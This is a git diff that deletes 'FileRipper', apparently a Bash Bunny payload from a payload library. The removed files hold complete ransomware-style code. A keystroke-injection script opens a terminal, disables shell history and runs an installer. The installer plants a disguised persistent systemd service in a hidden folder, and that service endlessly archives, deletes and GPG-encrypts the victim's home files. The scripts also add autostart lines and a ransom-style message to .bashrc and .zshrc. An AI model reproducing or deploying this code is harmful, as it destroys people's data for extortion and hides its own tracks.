diff --git a/payloads/library/execution/FileRipper/README.md b/payloads/library/execution/FileRipper/README.md
deleted file mode 100644
index c4694360..00000000
--- a/payloads/library/execution/FileRipper/README.md
+++ /dev/null
@@ -1,53 +0,0 @@
-## About:
-* Title: FileRipper
-* Description: FileRipper is a payload which encrypts users data.
-* AUTHOR: drapl0n
-* Version: 1.0
-* Category: Execution
-* Target: Unix-like operating systems with systemd.
-* Attackmodes: HID, Storage
-
-## FileRipper: FileRipper is a payload which encrypts users data using asymmetric cipher.
-
-### Features:
-* Encrypts personal files and directories in home directory.
-* Decryptable using private key.
-* Persistent.
-* Autostart payload on boot.
-
-### Workflow:
-1. Stop storing history, this helps to keep tracks clear from begining.
-2. Importing Public GPG key.
-3. Creating non-root systemd service.
-4. Deploying fileRipper.
-5. Autostarting service on opening terminal with shell (bash and zsh).
-6. Entering Message.
-
-### Directory Structure of payload components:
-| FileName | Directory |
-| -------------- | ----------------------------- |
-| payload.txt | /payload/switch1/ |
-| payload.sh | /payload/ |
-| fileRipper | /tools/ |
-| public.pub | /tools/ |
-
-### Changes to be made:
-* Replace key name "alice" with your key name in payload.txt on line no ```50```.
-* Replace key name "alice" with your key name in fileRipper on line no ```6```.
-* Change message in payload.sh on line no ```14```.
-* Remove line no ```14``` and ```15``` in payload.sh to disable displaying message.
-
-### Usage:
-* #### Create new key pair:
- ```gpg --full-gen-key --expert```
-* #### Dump public key of freshly created gpg key:
- ```gpg --armor --export > public.pub```
-
-### LED Status:
-* `SETUP` : MAGENTA
-* `ATTACK` : YELLOW
-* `FINISH` : GREEN
-
-#### Support me if you like my work:
-* https://twitter.com/drapl0n
-
diff --git a/payloads/library/execution/FileRipper/fileRipper b/payloads/library/execution/FileRipper/fileRipper
deleted file mode 100644
index df475a3c..00000000
--- a/payloads/library/execution/FileRipper/fileRipper
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/bin/sh
-cd ~/
-encrypt(){
- dirFile=$(ls | head -n 1)
- tar cf ~/.crypttt/$dirFile.tar.gz --exclude='.' --exclude='..' --exclude='.crypttt' --remove-files $dirFile
- gpg -e -r alice -o ~/.crypttt/$dirFile.tar.gpg ~/.crypttt/$dirFile.tar.gz && rm -rf ~/.crypttt/$dirFile.tar.gz
-}
-for (( ; ; ))
-do
- encrypt
-done
diff --git a/payloads/library/execution/FileRipper/payload.sh b/payloads/library/execution/FileRipper/payload.sh
deleted file mode 100644
index 8eace516..00000000
--- a/payloads/library/execution/FileRipper/payload.sh
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/bin/bash
-lol=$(lsblk | grep 1.8G)
-disk=$(echo $lol | awk '{print $1}')
-mntt=$(lsblk | grep $disk | awk '{print $7}')
-cp -r $mntt/tools/public.pub /tmp
-gpg --import /tmp/public.pub
-rm /tmp/public.pub
-mkdir ~/.crypttt
-mkdir -p ~/.config/systemd/user
-echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysCall -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service
-mkdir /var/tmp/.system
-cp -r $mntt/tools/fileRipper /var/tmp/.system/sysCall
-chmod +x /var/tmp/.system/sysCall
-echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.bashrc\nfi" > ~/tmmmp
-chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp
diff --git a/payloads/library/execution/FileRipper/payload.txt b/payloads/library/execution/FileRipper/payload.txt
deleted file mode 100644
index c2ca2299..00000000
--- a/payloads/library/execution/FileRipper/payload.txt
+++ /dev/null
@@ -1,99 +0,0 @@
-# Title: FileRipper
-# Description: FileRipper is a payload which encrypts users data.
-# AUTHOR: drapl0n
-# Version: 1.0
-# Category: Execution
-# Target: Unix-like operating systems with systemd.
-# Attackmodes: HID, Storage
-
-LED SETUP
-ATTACKMODE STORAGE HID
-GET SWITCH_POSITION
-LED ATTACK
-Q DELAY 1000
-Q CTRL-ALT t
-Q DELAY 1000
-
-# [Prevent storing history]
-Q STRING unset HISTFILE
-Q ENTER
-Q DELAY 200
-
-# [Fetching BashBunny's block device]
-Q STRING lol='$(lsblk | grep 1.8G)'
-Q ENTER
-Q DELAY 100
-Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
-Q ENTER
-Q DELAY 200
-
-# [Mounting BashBunny]
-Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
-Q ENTER
-Q DELAY 2000
-Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
-Q ENTER
-Q DELAY 500
-
-# [executing payload script]
-Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
-Q ENTER
-Q STRING chmod +x /tmp/payload.sh
-Q ENTER
-Q STRING /tmp/./payload.sh
-Q ENTER
-Q DELAY 2000
-Q STRING rm /tmp/payload.sh
-Q ENTER
-Q DELAY 500
-# REM replace 'alice' with name of your key
-Q STRING gpg --edit-key alice
-Q ENTER
-Q DELAY 300
-Q STRING trust
-Q ENTER
-Q DELAY 200
-Q STRING 5
-Q ENTER
-Q DELAY 190
-Q STRING y
-Q ENTER
-Q CTRL c
-Q DELAY 200
-Q STRING gpg --check-trustdb
-Q ENTER
-Q STRING gpg --update-trustdb
-Q ENTER
-Q DELAY 300
-Q STRING systemctl --user enable --now libSystemIO.service
-Q ENTER
-Q DELAY 300
-Q STRING systemctl --user start libSystemIO.service
-Q ENTER
-Q DELAY 100
-Q DELAY 200
-
-# REM [autostart on opening terminal]
-Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.zshrc
-Q ENTER
-Q DELAY 200
-Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.bashrc
-Q ENTER
-
-# REM [Message]
-# REM Remove this block if you dont want to prompt message to victim.
-# REM Change your message.
-Q ENTER
-Q DELAY 100
-Q STRING echo "echo Enter Your Message Here" >> ~/.bashrc
-Q ENETR
-Q STRING echo "echo Enter Your Message Here" >> ~/.zshrc
-Q ENTER
-
-# [Unmounting BashBunny]
-Q STRING udisksctl unmount -b /dev/'$disk'
-Q ENTER
-Q DELAY 500
-# Q STRING exit
-Q ENTER
-LED FINISH